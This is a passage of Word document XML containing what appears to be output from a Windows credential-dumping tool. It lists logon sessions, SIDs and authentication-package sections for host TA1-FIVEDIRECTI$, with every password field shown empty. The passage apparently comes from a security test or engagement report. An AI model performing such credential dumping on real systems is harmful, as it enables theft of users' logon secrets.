      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FF9D87" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144B05AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D25C28C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA542A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA2F84" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AFDE605" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 122531 (00000000:0001dea3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E2C74" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Service from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AC2181" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : SSHD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208E10A8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : NT SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521B8C1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B985AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:40:23 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A1536" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-80-3847866527-469524349-687026318-516638107-1125189541</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1CB106" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC02F6A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E7AF47" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133C125C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0299058E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4376B98E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB9536E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC28172" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CECCE20" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AC880D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CEC402C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 997 (00000000:000003e5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E66D5F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Service from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2A3F11" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : LOCAL SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C231B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : NT AUTHORITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F9F858" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB93105" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:40:21 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549A599E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406CE335" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5535CE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFDF999" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395D53A6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5EE4D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CF3C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0E892" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6306E368" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4EF9BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF3274" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CF7CD5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4D869" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1F1699" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B2DF58" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 996 (00000000:000003e4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772F253B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Service from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B448B5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5646C2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E555BE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36174EFD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:40:21 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373E0824" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CB2AD0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A365051" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B41CB4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BDE0BC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676360BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8327B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4496CD3A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C03AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : ta1-fivedirecti$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473633B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056A6626" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD668B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3B8D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C5E6FE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613B7989" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 24547 (00000000:00005fe3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B25FC0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73102090" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : UMFD-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE3005" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : Font Driver Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37450576" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF4AF1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:40:20 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AFFE8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-96-0-0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D82099" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C678C0F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B750CAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2473C135" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C7D3DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18179550" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7D13D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB2ED53" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A474CAA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C54E27C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8188E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 21583 (00000000:0000544f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D3E22" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : UndefinedLogonType from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F59E1A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF4009" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D086505" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76186327" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:40:20 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A0D691" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SID               : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555434D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C16D7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584FDD0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A09E7E1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911A257" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648DCA55" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E97F9D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17589A94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 999 (00000000:000003e7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2EE1B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : UndefinedLogonType from 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A958A3C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E50373" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : WORKGROUP</w:t>
      </w:r>
    </w:p>
